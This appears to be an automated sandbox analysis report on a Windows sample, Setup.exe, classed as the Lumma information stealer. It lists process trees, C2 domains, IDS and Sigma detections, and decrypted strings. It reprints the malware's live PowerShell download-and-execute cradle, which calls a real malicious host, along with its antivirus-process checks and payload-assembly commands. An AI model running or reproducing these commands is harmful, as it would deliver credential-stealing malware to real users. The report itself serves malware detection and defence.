Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:	Setup.exe
Analysis ID:	1588280
MD5:	380cef4cfa43fa74716059e3296850ec
SHA1:	219e5f27a6b3f5b97add28a5f663ead6d524f4b0
SHA256:	8f9c072ea3c1246b4602b9f407c35191cc4007fad3076005d0194e89025ca365
Tags:	AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates HTML files with .exe extension (expired dropper behavior)

Drops PE files with a suspicious file extension

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

Setup.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 380CEF4CFA43FA74716059E3296850EC)

cmd.exe (PID: 2172 cmdline: "C:\Windows\System32\cmd.exe" /c move Pro Pro.cmd & Pro.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 348 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6520 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 6420 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5784 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4720 cmdline: cmd /c md 302164 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 6512 cmdline: extrac32 /Y /E Hentai MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 6460 cmdline: findstr /V "ENOUGH" Golf MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5068 cmdline: cmd /c copy /b 302164\Vulnerability.com + Tape + Naval + Offered + Rhode + Wiring + Tapes + Loc + Treasures + Determining + Tiny + Affects + Computing 302164\Vulnerability.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 5176 cmdline: cmd /c copy /b ..\Achieved + ..\Indians + ..\Por + ..\Argentina + ..\Documentation + ..\Usda + ..\Standard + ..\Cdt v MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Vulnerability.com (PID: 2316 cmdline: Vulnerability.com v MD5: 62D09F076E6E0240548C2F837536A46A)

powershell.exe (PID: 6008 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 3304 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["crowdwarek.shop", "handscreamny.shop", "soundtappysk.shop", "throwlette.cyou", "robinsharez.shop", "apporholis.shop", "versersleep.shop", "chipdonkeruz.shop", "femalsabler.shop"], "Build id": "hRjzG3--TRON"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Vulnerability.com v, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com, ParentProcessId: 2316, ParentProcessName: Vulnerability.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6008, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Vulnerability.com v, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com, ParentProcessId: 2316, ParentProcessName: Vulnerability.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6008, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Vulnerability.com v, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com, ParentProcessId: 2316, ParentProcessName: Vulnerability.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6008, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Vulnerability.com v, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com, ParentProcessId: 2316, ParentProcessName: Vulnerability.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6008, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Vulnerability.com v, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com, ParentProcessId: 2316, ParentProcessName: Vulnerability.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 6008, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Pro Pro.cmd & Pro.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2172, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5784, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:04.312317+0100	2028371	3	Unknown Traffic	192.168.2.5	49871	104.102.49.254	443	TCP
2025-01-10T23:28:05.524064+0100	2028371	3	Unknown Traffic	192.168.2.5	49882	104.21.32.1	443	TCP
2025-01-10T23:28:17.637094+0100	2028371	3	Unknown Traffic	192.168.2.5	49962	104.21.32.1	443	TCP
2025-01-10T23:28:18.854106+0100	2028371	3	Unknown Traffic	192.168.2.5	49970	104.21.32.1	443	TCP
2025-01-10T23:28:19.827278+0100	2028371	3	Unknown Traffic	192.168.2.5	49978	104.21.32.1	443	TCP
2025-01-10T23:28:20.857657+0100	2028371	3	Unknown Traffic	192.168.2.5	49985	104.21.32.1	443	TCP
2025-01-10T23:28:41.782800+0100	2028371	3	Unknown Traffic	192.168.2.5	49987	104.21.32.1	443	TCP
2025-01-10T23:28:42.729942+0100	2028371	3	Unknown Traffic	192.168.2.5	49988	104.21.32.1	443	TCP
2025-01-10T23:28:45.728519+0100	2028371	3	Unknown Traffic	192.168.2.5	49989	104.21.32.1	443	TCP
2025-01-10T23:28:47.789238+0100	2028371	3	Unknown Traffic	192.168.2.5	49990	104.21.32.1	443	TCP
2025-01-10T23:28:49.140141+0100	2028371	3	Unknown Traffic	192.168.2.5	49991	185.161.251.21	443	TCP
2025-01-10T23:28:49.971104+0100	2028371	3	Unknown Traffic	192.168.2.5	49992	172.67.162.153	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:17.133440+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49882	104.21.32.1	443	TCP
2025-01-10T23:28:18.111531+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49962	104.21.32.1	443	TCP
2025-01-10T23:28:48.270897+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49990	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:17.133440+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49882	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:18.111531+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49962	104.21.32.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:03.585264+0100	2059035	1	Domain Observed Used for C2 Detected	192.168.2.5	63819	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:03.619601+0100	2059037	1	Domain Observed Used for C2 Detected	192.168.2.5	60134	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:03.597572+0100	2059039	1	Domain Observed Used for C2 Detected	192.168.2.5	65405	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:03.575154+0100	2059041	1	Domain Observed Used for C2 Detected	192.168.2.5	61126	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:03.630579+0100	2059043	1	Domain Observed Used for C2 Detected	192.168.2.5	53020	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:03.641209+0100	2059049	1	Domain Observed Used for C2 Detected	192.168.2.5	59614	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:03.558872+0100	2059051	1	Domain Observed Used for C2 Detected	192.168.2.5	50381	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:03.608592+0100	2059057	1	Domain Observed Used for C2 Detected	192.168.2.5	56069	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:19.339853+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49970	104.21.32.1	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:28:04.910878+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49871	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://dfgh.online/invoker.php?compName=user-PC	Avira URL Cloud: Label: malware
Source: throwlette.cyou	Avira URL Cloud: Label: malware
Source: https://klipgonuh.shop/int_clp_sha.txt	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["crowdwarek.shop", "handscreamny.shop", "soundtappysk.shop", "throwlette.cyou", "robinsharez.shop", "apporholis.shop", "versersleep.shop", "chipdonkeruz.shop", "femalsabler.shop"], "Build id": "hRjzG3--TRON"}

Multi AV Scanner detection for submitted file

Source: Setup.exe	Virustotal: Detection: 35%			Perma Link
Source: Setup.exe	ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.4% probability

Sample uses string decryption to hide its real strings

Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: robinsharez.shop
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: handscreamny.shop
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: chipdonkeruz.shop
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: versersleep.shop
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: crowdwarek.shop
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: apporholis.shop
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: femalsabler.shop
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: soundtappysk.shop
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: throwlette.cyou
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: hRjzG3--TRON

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49962 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.153:443 -> 192.168.2.5:49992 version: TLS 1.2

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2958235445.00000000077C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2959149859.0000000007823000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb\| source: powershell.exe, 00000011.00000002.2966793248.0000000008790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2966793248.0000000008790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2958235445.00000000077CD000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
